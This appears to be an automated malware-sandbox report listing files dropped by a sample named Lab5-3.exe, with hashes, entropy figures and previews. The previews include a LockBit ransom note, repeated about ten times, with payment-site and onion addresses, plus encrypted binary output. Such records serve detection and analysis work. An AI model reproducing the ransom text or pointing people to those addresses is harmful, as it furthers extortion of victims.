                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6512
                                                                                                          Entropy (8bit):7.969903782503343
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:qppSFYo7fo962xHnNPD47es09VKMWp/ahK7k4C5YF7DML5Zbr58INnYu56fCfj2I:8IYoTiLvjl9VwpCKQP5JjSusCfjV0Cb
                                                                                                          MD5:1914975139639B5B09C0D552FE03C817
                                                                                                          SHA1:CA3780EC9F53320FEAB44B891320B95AD80B6BF3
                                                                                                          SHA-256:F954D3B1A53C38B442FA926571620F77E2283F18B3FB50820D9FC22469C9B649
                                                                                                          SHA-512:14E4460931A66028990B95B716C19B37E7FA167F2101683BDC5426A8AF9934E4906B9B90322F7CE0D2F1117BA680FCD1BE9D95320A069FE8A8CCC2EC5F868B07
                                                                                                          Malicious:false
                                                                                                          Preview:...pO_..g.~..e.j#.@.G7*Z..@=6..?r..gl..s!v.".Z.6.68...O.c..F.;..&.g...C.......@.d...{.t...j........ ..:C....v<M?.&...]p.....KmO...O'./.|.j..0..s..-...h.^..:..T....]..'.W(.....p.&......@{&._...1G..+.h.<....TlJ........O.C>!.Y..d....+..~'.H..4e.........Jx`H.X7.....i.g..d9.o..e)-.Ii{.MZ..'......!.........>%.3..VZ..a...1....x..+.r.4..#c....2....F..w.aW~.U.)B.1.@&.x......_...$@...pw.\.....^-..o.9.\..6F..8..:...;.9..M..2~F..9.*B...s........D(..."i.W..........#.{.0.Lb.!.Z:....8..%...F...?.'|.n.._...|U&h.%C ...}.....\F.........f._:X..j....c.W...$..5..C..W49r.a.C.......i$>M....5....ea.....6.x/...^..[.c!B."_...Q*C...S.....%&M.#.i.C.,.p....h.$....u...L....3s:V ..5&.:..L...Z{2PT.../....1.C......*...Y\g.!.v...J../.x.b..8LP.T.'..S..E.A....D&{..+.L...K...Nw..m.1.Wa.C.p..r.._....(.H....c.?....F.u.y1.;.k....j.B....M.4.7.D.o...P.J.c.2....) ..3.=P..[K ..4.n..F..N.`.[DZ...[.Y..MP.. ........]A..M.w.y....FN.*..~P......$..m.^.]y.qg.....8R<....5.."....f...g.n$...ngM.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6704
                                                                                                          Entropy (8bit):7.967385333765855
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:zba6K9R5vGMuZWGcPW0CLo6Zo9Biuj08l6lmLh7cTD0Cb:va6scrPnoP7EmLhCtb
                                                                                                          MD5:EDDC99E8E6410DAEFFE51C571ED8FB3C
                                                                                                          SHA1:9DA3A0380F726BD313D74C53A76DA0DCCD804679
                                                                                                          SHA-256:E70424D1D49AB42724DEF440E4E1DD950E156C202682A8AA2165A307EBE56001
                                                                                                          SHA-512:D4E19657D1670D18B644B7B4469334D7009809AA571BF2B163475D144BE7FE554EA5EA18D948586C97735D01690040B470D9FDF74C14371ABE42FDFA9BD52B56
                                                                                                          Malicious:false
                                                                                                          Preview:Cg.)..smP.\t8.+.'p.@...-..|.V.....Y/k..Q.`).......d`.n.Q.6.GA.L.B~Fv..5,....K..._:.>..../.....toL..z..%..@b...ji.=.......C.Q..H9|.6=[....d..?.....h7.....*.^......~..q+.....s.....K...6i......{X0V.a.<........O..Y..$.jj.^...E..y@h[.N..m@.A...!.*.gKB....\..K..p[...l&....4.`..Wg9...4-gV..P.9s.n...6...16......_RoR.Q.e%.Y..2,...Q5...IW..4.!_.k<.*...9.....[..v.....5Al..tQ..NW![.|..u....P...$xL....y.......7..a5..%.;...a....T<..{$Q.9).PG.*T$4.........7.~9.}....../72.......#.e.LpH.'eh...h.,Q.{.........3.|..........).Z....9.....:K8$G.s}.;......<..u..UR..A..H......_...:.&..jO.t...'...v.z_D.:..c.s^.TK...*u.9....:..).KH.[2C..[.*AV..Z....mI7.S.......G...K"l.?=.....[6K.z%R[ ....J.q......RBW.....c.#..l...e.0..^8..d.....!.k......v.zl.}.D......9_A.OoR.,.=..4P&....9.%"...Lc.....00.2Nw7..]3....hp......he'r...Am...B.~......M....K.l0...g.[.....N..V..V\n..D........`....7../P......U.X"..@.d......e...z...L..)....+.z..n.3Q...L'_.....9i Klto}"R...$.v......{.d..L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21184
                                                                                                          Entropy (8bit):7.990861703968664
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:fEfN/blkShqW86i06T858b6blCA7F/9w8+SLTeHBYd+5Q9qJRrk1XmE20x8tb:sfNRpkDjTBkVt9b1vr05QQBkYEx8Z
                                                                                                          MD5:12856112807791789F3A4E2C139DA0ED
                                                                                                          SHA1:41D840C466F714A942FCE41AF51C2879D43A77F5
                                                                                                          SHA-256:049FC0FD523AAAF8FBDFC9862CDF40B52D6C619CF37F5AE9AF308306BF3176C6
                                                                                                          SHA-512:6A8C5F92B7979314A5C6E94CF1817DD99D377A412840252E7E8B3DE1536AA6DACBF7C1F701F8C2BE80C520BF5B0DA3B2919F4BB5113AD9E243D73F2830D0B379
                                                                                                          Malicious:true
                                                                                                          Preview:...Yb.Y../.?KB{!.O...b....T.w.L.U.../$.&..H)....f.u.9...&.(.....{..$XB61....xp.k.......,..]:.....)...E...Np...J...z!.iP.?bKM...u..*.e.A.E.D...<........J.Cyj~.;...:|..#..C.l.u3..LR'..L....qd.e..\9i.:............W..Br.1.-.5....b)..c...(nk.9H.......NHs*e#.@.I{;._..';T.G,....."...i./...........].._.u..[(.7.G ...].`.....o.iq......-..'~6>@..}h[_N...'.....3..N..0....4..,;`n%<n.....C=q._Bq....)...... _.B..]./#[..{\....U.m.:+..V(.?).1..y.......h.r....Y..k....\....l]S-UC..s..5.1..z...............@o.Qz..Y..%..\..Gc..|.c....I.9=*>R.M..].r..../..s.&...Z.es...x.V7(O..:<FjP.y....A..W%.l.E{...avhVM....?.{.-....v....(.Rl.V?W...n}.CN.F.......g.....Tp-..m...f.}2+.k.F>.G.....#w!.U.bO*...]o..k...,.f....H..2.D......B............Qy>..ve.......%V..hUt<......A.(.O.5[w..4^..W..4..1..3ZH4:.....X.4."..E..: 1..o....`.^......6.(q.n...y...On..#.?...].Q..+......-..#pX.Y..g.<......W,..Q....8._.z.N.0...i.N...9<]@.Cm.Ma3.Zv}.c....p7V.........R.;..p(J..~.Y...F/.+<..w"
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25968
                                                                                                          Entropy (8bit):7.992699709057537
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:pRYgS0rXftQv0X98Th3HmSpey42zreqRmhjG3pIuvyMneGQvda2dRVbrGenxxyJZ:/Yg1PH+ThXpey3KqRmMy2Qs2dLbKkjyZ
                                                                                                          MD5:984D3525A530478CFCCD7C56B9140BD7
                                                                                                          SHA1:C88F4B2AB0070DB3220B1F380CF4102DB4B05E74
                                                                                                          SHA-256:B4875910C036A662EF978516806C464A2D182011C468DC62DFC58809AAE637BD
                                                                                                          SHA-512:856B1D8998FC6C2390FE75424BC69206DBAB36E182F4743CE720061EF04FA96EB35B76C5BCDD37D23053FCDE09B1346FA845F0A4F7255FA74EA4616F2C9D4193
                                                                                                          Malicious:true
                                                                                                          Preview:.U.S..Y.8(.y...Z.GR.u...n.k.....<sJ+....t....H4....Z.za.X&Y.^...]..*........>.&.....g...J....F.. h.q...H"...P..@.n..:M8b....._L.N...kj....H.....C...r.+...k...&..D(.-..+...x..G...:..Y......aX.o..G....g}^.Y4u.V..n..+..3q.....n@..2N...:\,..bYWD{.!)y-...N.+v...|.h.[z[...%.Q.<.C...P...^L%.%.b7x..ZR.....r@...[7]=.!u.7AE.^...' ...%.pvD..P..'...A...9.....Z.....'.S..nh.-...&(...6...c....=].|w.c......=.-M.&w..K,...).,...o........(Uo..E..PH7L..Q...8.=.U..P..a.D...1.CQ5..~..o.......m..@.-s..6w..."w:.-...$..^....tY.;.To8.0...t..ak.T.r.,...V>.W...u..'....O.....i}z..._.!.ii.c..'...B.u..D...V%...1.n....L..'..`..Awr.....Y-.xm ....`qA.u..J|.:.W.G^xh..9..".U..1^g tL..]qZ..p..J.N8.7B....$..K.Wb..b...U..=......;..."..(.K..2?..]....b..ewjN..O=....$..5.<.}{%......y.B.K..3.j>.Y:c..u.|..6#7..T..!..,'R86...=:..S..M.E/..r.-...=s.=...!g..%.{}.d...&J.x...t.....[....&X..I..XFvR..D*....(..L?.PF..a.f.. ..p.q.Shp`1!.#....8..0...;O..S.....l.. .]....~.7...C.3@$>..FT.}W..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24048
                                                                                                          Entropy (8bit):7.9930838695284026
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:AP9X4CZ1d0AJWuy1ij8HGFHrR+j67+fpg/78nlQWWFyMhI/HmMcCk3J+iRuHtStb:AVRPd5Yuyw7F0fE7RBFyQAHmMasjSZ
                                                                                                          MD5:7A5E514292E6BCDB5DBA2DE5B9179571
                                                                                                          SHA1:141E480C7C4D6389DCB7494192C8F9C4BB3784C5
                                                                                                          SHA-256:583A9DFFD0B6B96E95D935FE1F092E110C6695F458B984EB8FC878A163C52BB5
                                                                                                          SHA-512:4CD2927E9720AA3EF97B9E4DB7B3B98EAC640D5D290152A975DC4E2A1A9BE886D3CA5265EBFB1F97D012F4493E07B2486A3CBCB77EA6D65B4A4580620035B762
                                                                                                          Malicious:true
                                                                                                          Preview:...;C2....D.~O....x...\....;.....~..!.&.]_.S.:....t.......vj..,..jejz..;.xo..o.i.>?..e.....<K..........I...f...-.[_..$.....WL.Z...ma..G.,..`..tr........<.U.L<2.....k......T6..l..v.`.%m.i.^(A.S......"...o.]..7.MKE..r...."...K...5.......;s.D.o...H........2=..*2....h.Wj.....=.`.OR..VC.......o.=...KL..$YJ;....Y.<.........PZ,Y..mn.`......p.6I....fp].AKS....S*.,..............s.........>j.......c..q.)#.......8.....@..a.J.....+Z..hx.K..%.Z*..c...^.g..c...U.,......r.Y`j...^_=-..6\..p.P.~*P.......]B......>..Ph.H..\r..k..}x....|."}#...J.^.*Qp...@.....>PU....i.... .f/..v...VE....>;....~.7.....p3.D......t{-.e.J..y..W.Z.tr....X.&.Q.!^.D....^.oT..X9.E+.v$AK.u.i..9.#........VSy......o../$M..!=....$............K...........E-..@.d.5..R...X..Et/v..d..d..$I.......+....lx.!..Xo..:..!...z...D...JE...7`n..P._.k...aR...R..(.xB88.....<X....|..o,..'.a...w...Q.."...k..|_...O.5....v..6..?9B!0...X4.|...)......1O...c..*1....di..7p..|_A.....c..!>0....`
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35392
                                                                                                          Entropy (8bit):7.9951006201565376
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ZqKr7i9rDrCWTcbUHfo3S0CYLoi+tL5tZ:ZqK/etAbcfo3S0F0i+p5tZ
                                                                                                          MD5:0443B441201FF00F499B5CF91A2E285C
                                                                                                          SHA1:C0A397359D1C554E453C5B6D62746D3666BE3F17
                                                                                                          SHA-256:DAA62594C5BF19256E3DB502686E559FD89640EA85FDA76D4DB6B9CB3F2A1180
                                                                                                          SHA-512:65419946E6B1631FDF324F079F4157A47221D08A06ED401EED2B7782A3EFB635DF6BCAAA62F74F094E462CD4CEA73318EF0820BD79174A564F2F4A00F341B385
                                                                                                          Malicious:true
